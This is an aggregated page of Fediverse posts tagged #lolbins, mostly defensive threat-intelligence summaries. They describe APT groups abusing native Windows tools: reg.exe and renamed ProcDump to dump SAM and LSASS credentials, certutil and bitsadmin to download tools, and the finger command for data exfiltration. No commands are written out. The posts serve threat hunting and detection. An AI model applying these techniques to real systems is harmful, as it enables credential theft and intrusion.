home.social
Sign in Create account

#lolbins — Public Fediverse posts

Live and recent posts from across the Fediverse tagged #lolbins, aggregated by home.social.

  1. Pyrzout :vm: @[email protected] ·

    Microsoft elimanará WMIC en la actualización Windows 11 25H2 blog.elhacker.net/2025/09/micr #powershell #ransomware #LOLBins #Windows #wmi

    #powershell #ransomware #lolbins #windows #wmi
  2. Dan :dumpster_fire: @[email protected] ·

    Was looking for a good Awesome list on Living Off the Land ( #LOL #LOtL ) tools/techniques. Found some helpful sites / repos but either nothing I could contribute to or it was limited.

    So... I made one: github.com/danzek/awesome-lol-

    Contributions welcome, whether by replying to this post or sending a PR on GitHub.

    #lolbins #lolbas

    #lol #lotl #lolbins #lolbas
  3. Huntress @[email protected] ·

    Did you know that the finger command can be used for data exfil? We recently had an incident where this type of activity was found

    huntress.com/blog/cant-touch-t

    #DFIR #lolbins #lolbas #exfil #mchammer #CTI #cybersecurity
    @keydet89

    #dfir #lolbins #lolbas #exfil #mchammer #cti
  4. Just Another Blue Teamer @[email protected] ·

    The Symantec research team uncovered an espionage campaign from the #APT group they track as #Redfly. The group used multiple tools during the campaign which included the #ShadowPad trojan, #Packerloader, and a key logger. They also abused some #LOLBINs to achieve their goals.

    Redfly masqueraded ShadowPad in a "VMware" directory and gained persistence by creating a service that ran the malware once the computer started and the keylogger stored its captured keystrokes in a directory that included "Intel" in the path. The APT group used the reg.exe to dump credentials from he SYSTEM, SAM, and SECURITY hive. They also used a renamed version of ProcDump to dump credentials from LSASS. Powershell was also used to gather information on the storage devices attached to the system and finally a scheduled task was created to preform side-loading and lateral movement. #HappyHunting!

    #CyberSecurity #ITSecurity #InfoSec #BlueTeam #ThreatIntel #ThreatHunting #ThreatDetection #readoftheday

    #apt #redfly #shadowpad #packerloader #lolbins #happyhunting
  5. Just Another Blue Teamer @[email protected] ·

    Good day everyone! The Microsoft Threat Intelligence team has discovered activity from a group known as #FlaxTyphoon. They are a nation-state group from China that targeted organizations in Taiwan. While the group leverages tools that are commonly used, like #ChinaChopper, #MetaSploit, and #Mimikatz, they also rely on abusing #LOLBINS, or Living-off-the-land binaries and scripts (tools that exist and come with the native operating system). Some of their TTPs include using registry key modification for persistence, using #powershell, #certutil, or #bitsadmin to download tools, and accessing #LSASS process memory and Security Account Manager registry hive for credential access. This is a great article that not only provides high-level details but it provides a starting point for any organization to start threat hunting by using the technical details provided! Enjoy your weekend and #HappyHunting!

    #CyberSecurity #ITSecurity #InfoSec #BlueTeam #ThreatIntel #ThreatHunting #ThreatDetection #readoftheday

    #powershell #certutil #bitsadmin #lsass #happyhunting #cybersecurity